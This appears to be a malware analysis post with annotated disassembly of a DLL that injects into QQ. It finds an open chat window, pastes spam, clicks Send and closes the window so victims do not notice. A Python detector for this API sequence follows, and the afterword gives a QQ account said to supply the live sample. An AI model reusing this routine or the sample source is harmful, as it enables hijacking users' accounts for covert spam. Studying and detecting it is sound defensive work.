There is no dropper, only the DLL itself, so it is not that easy to analyze...
A quick rundown of how it works:
00786165 |. BA 20637800 mov edx, 00786320 ; ASCII "Explorer.Exe"
0078616A |. A1 6C877800 mov eax, dword ptr ds:[78876C]
0078616F |. E8 78EAFFFF call 00784BEC
\\ Set the global hook
00786174 |. F6D8 neg al
00786176 |. 1BC0 sbb eax, eax
00786178 |. 8B15 04727800 mov edx, dword ptr ds:[787204] ; Info_Ms.007870BC
0078617E |. 8902 mov dword ptr ds:[edx], eax
00786180 |. BA 38637800 mov edx, 00786338 ; ASCII "Qq.Exe"
00786185 |. A1 6C877800 mov eax, dword ptr ds:[78876C]
0078618A |. E8 5DEAFFFF call 00784BEC
\\ Detect the QQ process starting up and inject into it.
Search the currently active window for a child of window class #32770 (a standard dialog):
00785899 |. 6A 00 push 0 ; /Title = NULL
0078589B |. 68 88597800 push 00785988 ; |Class = "#32770"
007858A0 |. 6A 00 push 0 ; |hAfterWnd = NULL
007858A2 |. 8B45 FC mov eax, dword ptr ss:[ebp-4]; |
007858A5 |. 50 push eax ; |hParent
007858A6 |. E8 CDE7FFFF call <jmp.&user32.FindWindowExA>; \FindWindowExA
007858AB |. 8BF8 mov edi, eax
007858AD |. 85FF test edi, edi
007858AF |. 0F84 AF000000 je 00785964
Find the QQ "Send" button:
007858B5 |. 68 90597800 push 00785990 ; /Title = "发送(&S)" (OllyDbg shows it as ""B7,"",A2,"送(&S)": the GBK bytes B7 A2 are "发")
007858BA |. 68 9C597800 push 0078599C ; |Class = "Button"
007858BF |. 6A 00 push 0 ; |hAfterWnd = NULL
007858C1 |. 57 push edi ; |hParent
007858C2 |. E8 B1E7FFFF call <jmp.&user32.FindWindowExA>; \FindWindowExA
007858C7 |. 8945 F4 mov dword ptr ss:[ebp-C], eax
007858CA |. 837D F4 00 cmp dword ptr ss:[ebp-C], 0
007858CE |. 0F84 90000000 je 00785964
007858D4 |. 33DB xor ebx, ebx
What is AfxWnd42, the chat message cache? (AfxWnd42 is the generic window class name that MFC 4.2 registers for CWnd-derived windows, so it is just an MFC container window; the loop below walks every AfxWnd42 child of the dialog until it finds one that contains an edit control.)
007858D6 |> 6A 00 /push 0 ; /Title = NULL
007858D8 |. 68 A4597800 |push 007859A4 ; |Class = "AfxWnd42"
007858DD |. 53 |push ebx ; |hAfterWnd
007858DE |. 57 |push edi ; |hParent
007858DF |. E8 94E7FFFF |call <jmp.&user32.FindWindowExA>; \FindWindowExA
007858E4 |. 8BD8 |mov ebx, eax
007858E6 |. 85DB |test ebx, ebx
007858E8 |. 74 7A |je short 00785964
007858EA |. 6A 00 |push 0 ; /Title = NULL
Find the chat input box (the one with the blinking cursor):
007858EC |. 68 B0597800 |push 007859B0 ; |Class = "RICHEDIT"
007858F1 |. 6A 00 |push 0 ; |hAfterWnd = NULL
007858F3 |. 53 |push ebx ; |hParent
007858F4 |. E8 7FE7FFFF |call <jmp.&user32.FindWindowExA>; \FindWindowExA
007858F9 |. 8BF0 |mov esi, eax
007858FB |. 85F6 |test esi, esi
007858FD |. 75 11 |jnz short 00785910
007858FF |. 6A 00 |push 0 ; /Title = NULL
The message window (tried only if no RICHEDIT child was found):
00785901 |. 68 BC597800 |push 007859BC ; |Class = "RichEdit20A"
00785906 |. 6A 00 |push 0 ; |hAfterWnd = NULL
00785908 |. 53 |push ebx ; |hParent
00785909 |. E8 6AE7FFFF |call <jmp.&user32.FindWindowExA>; \FindWindowExA
0078590E |. 8BF0 |mov esi, eax
00785910 |> 85F6 |test esi, esi
00785912 |.^ 74 C2 \je short 007858D6
Reading the QQ window text with WM_GETTEXT into a 0x104 (260) character buffer (a separate routine at 00784B43, out of address order with the rest of the listing):
00784B43 |. 52 push edx ; /lParam
00784B44 |. 68 04010000 push 104 ; |wParam = 104
00784B49 |. 6A 0D push 0D ; |Message = WM_GETTEXT
00784B4B |. 50 push eax ; |hWnd
00784B4C |. E8 5FF5FFFF call <jmp.&user32.SendMessageA> ; \SendMessageA
Messages sent to QQ. First select everything already in the edit control (EM_SETSEL with wParam = 0 and lParam = -1 selects all text):
00785914 |. 6A FF push -1 ; /lParam = FFFFFFFF
00785916 |. 6A 00 push 0 ; |wParam = 0
00785918 |. 68 B1000000 push 0B1 ; |Message = EM_SETSEL
0078591D |. 56 push esi ; |hWnd
0078591E |. E8 8DE7FFFF call <jmp.&user32.SendMessageA>; \SendMessageA
00785923 |. 8D45 F8 lea eax, dword ptr ss:[ebp-8]
00785926 |. E8 75DAFFFF call 007833A0
0078592B |. 50 push eax ; /lParam
0078592C |. 6A 00 push 0 ; |wParam = 0
Replace the selection with the spam text (EM_REPLACESEL), click "Send" (BM_CLICK), then close the window straight away so the user does not notice that their own QQ is sending spam:
0078592E |. 68 C2000000 push 0C2 ; |Message = EM_REPLACESEL
00785933 |. 56 push esi ; |hWnd
00785934 |. E8 77E7FFFF call <jmp.&user32.SendMessageA>; \SendMessageA
00785939 |. 6A 00 push 0 ; /lParam = 0
0078593B |. 6A 00 push 0 ; |wParam = 0
0078593D |. 68 F5000000 push 0F5 ; |Message = BM_CLICK
00785942 |. 8B45 F4 mov eax, dword ptr ss:[ebp-C]; |
00785945 |. 50 push eax ; |hWnd
00785946 |. E8 65E7FFFF call <jmp.&user32.SendMessageA>; \SendMessageA
0078594B |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
00785950 |. E8 EBE6FFFF call <jmp.&kernel32.Sleep> ; \Sleep
00785955 |. 6A 00 push 0 ; /lParam = 0
00785957 |. 6A 00 push 0 ; |wParam = 0
00785959 |. 6A 10 push 10 ; |Message = WM_CLOSE
0078595B |. 8B45 FC mov eax, dword ptr ss:[ebp-4]; |
0078595E |. 50 push eax ; |hWnd
0078595F |. E8 4CE7FFFF call <jmp.&user32.SendMessageA>; \SendMessageA
Overall:
1. Inject into QQ and look for an active window whose title contains "聊天中" (chatting), "群" (group) or "会话中" (in session).
2. If one is found, the condition is met: the spam message is put into the text box and sent from the victim's own account.
3. The QQ chat window is closed immediately so the victim does not notice their own QQ sending spam.
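The whole sequence above (the #32770 -> "发送(&S)" Button -> rich-edit window walk, then EM_REPLACESEL, BM_CLICK, a short Sleep and WM_CLOSE) is distinctive enough to hunt for in an API-call trace. The Python below is an added example, not code from this post or from the sample: it assumes a constructed trace of the form "<ms> <pid> <api>(<args>)" such as an API monitor or sandbox might emit, the process IDs and handles in it are made up, and the 2-second "closed immediately" threshold is my own choice based on the 500 ms Sleep in the listing.

```python
"""Detector for the QQ chat-window automation seen in the disassembly above.

Added example, not code from the original post or from the sample.  It
assumes a constructed API-call trace of the form "<ms> <pid> <api>(<args>)"
and looks for the sample's window walk (#32770 -> "Send" Button -> rich-edit
input box) followed by EM_REPLACESEL, BM_CLICK and a WM_CLOSE shortly after.
"""
import re
from collections import defaultdict

# Message numbers exactly as they appear in the listing.
WM_CLOSE = 0x10
EM_SETSEL = 0xB1
EM_REPLACESEL = 0xC2
BM_CLICK = 0xF5

SEND_BUTTON = "发送(&S)"                    # the Button title the sample looks for
EDIT_CLASSES = {"RICHEDIT", "RichEdit20A"}  # the two input-box classes it accepts

# Assumption: the sample sleeps 500 ms before WM_CLOSE, so a close within
# 2 s of the click counts as "immediately".
CLOSE_WINDOW_MS = 2000

# Constructed trace (not real data): pid 4120 behaves like the sample,
# pid 5800 only reads a dialog title, pid 6100 closes the window 30 s later.
TRACE = """
100 4120 FindWindowExA(0x000A0B2C, 0x0, "#32770", NULL)
101 4120 FindWindowExA(0x000A0C10, 0x0, "Button", "发送(&S)")
102 4120 FindWindowExA(0x000A0C10, 0x0, "AfxWnd42", NULL)
103 4120 FindWindowExA(0x000A0D44, 0x0, "RICHEDIT", NULL)
104 4120 SendMessageA(0x000A0E00, 0xB1, 0x0, 0xFFFFFFFF)
105 4120 SendMessageA(0x000A0E00, 0xC2, 0x0, 0x00B23F10)
106 4120 SendMessageA(0x000A0C10, 0xF5, 0x0, 0x0)
606 4120 SendMessageA(0x000A0B2C, 0x10, 0x0, 0x0)
200 5800 FindWindowExA(0x00030000, 0x0, "#32770", NULL)
201 5800 SendMessageA(0x00030100, 0xD, 0x104, 0x0012F000)
300 6100 FindWindowExA(0x00050000, 0x0, "#32770", NULL)
301 6100 FindWindowExA(0x00050100, 0x0, "Button", "发送(&S)")
302 6100 FindWindowExA(0x00050200, 0x0, "RichEdit20A", NULL)
303 6100 SendMessageA(0x00050300, 0xC2, 0x0, 0x00C00000)
304 6100 SendMessageA(0x00050100, 0xF5, 0x0, 0x0)
30304 6100 SendMessageA(0x00050000, 0x10, 0x0, 0x0)
"""

LINE_RE = re.compile(r"^(\d+)\s+(\d+)\s+(\w+)\((.*)\)$")


def _arg(text):
    """Turn one argument token into None (NULL), str (quoted) or int."""
    text = text.strip()
    if text == "NULL":
        return None
    if text.startswith('"') and text.endswith('"'):
        return text[1:-1]
    return int(text, 0)


def parse_trace(text):
    """Return (ms, pid, api, [args]) tuples; lines that do not parse are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ms, pid, api, args = m.groups()
            events.append((int(ms), int(pid), api, [_arg(a) for a in args.split(",")]))
    return events


# Each step is (name, predicate over (api, args)); they must match in this order.
# FindWindowExA args: (parent, after, class, title); SendMessageA: (hwnd, msg, wParam, lParam).
STEPS = [
    ("dialog", lambda api, a: api == "FindWindowExA" and a[2] == "#32770"),
    ("send_button", lambda api, a: api == "FindWindowExA" and a[2] == "Button" and a[3] == SEND_BUTTON),
    ("edit_box", lambda api, a: api == "FindWindowExA" and a[2] in EDIT_CLASSES),
    ("replace_text", lambda api, a: api == "SendMessageA" and a[1] == EM_REPLACESEL),
    ("click_send", lambda api, a: api == "SendMessageA" and a[1] == BM_CLICK),
    ("close_window", lambda api, a: api == "SendMessageA" and a[1] == WM_CLOSE),
]


def detect(events):
    """Return one finding per process that completes the whole sequence in time."""
    by_pid = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_pid[ev[1]].append(ev)

    findings = []
    for pid, evs in by_pid.items():
        step, seen = 0, {}
        for ms, _, api, args in evs:
            if len(args) != 4:          # both APIs of interest take four arguments
                continue
            name, matches = STEPS[step]
            if not matches(api, args):  # unrelated calls (AfxWnd42 walk, EM_SETSEL) are skipped
                continue
            seen[name] = ms
            step += 1
            if step == len(STEPS):
                delay = seen["close_window"] - seen["click_send"]
                if delay <= CLOSE_WINDOW_MS:
                    findings.append({"pid": pid, "click_ms": seen["click_send"],
                                     "close_ms": seen["close_window"], "delay_ms": delay})
                step, seen = 0, {}
    return findings


if __name__ == "__main__":
    for f in detect(parse_trace(TRACE)):
        print(f"pid {f['pid']}: spam sent, window closed {f['delay_ms']} ms after the click")
```

Only pid 4120 is reported: pid 5800 never reaches the Button lookup, and pid 6100 performs the full walk but closes the window 30 seconds later, which a user closing a chat by hand would also do. The delay threshold is the knob to tune against your own traces.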
Afterword: if you add that QQ account (714220) and chat with him, he will give you a sample; it should be "教程.exe" (tutorial.exe).
QQpass... (a junk virus, it only drops a copy of itself on the E: drive; pathetic)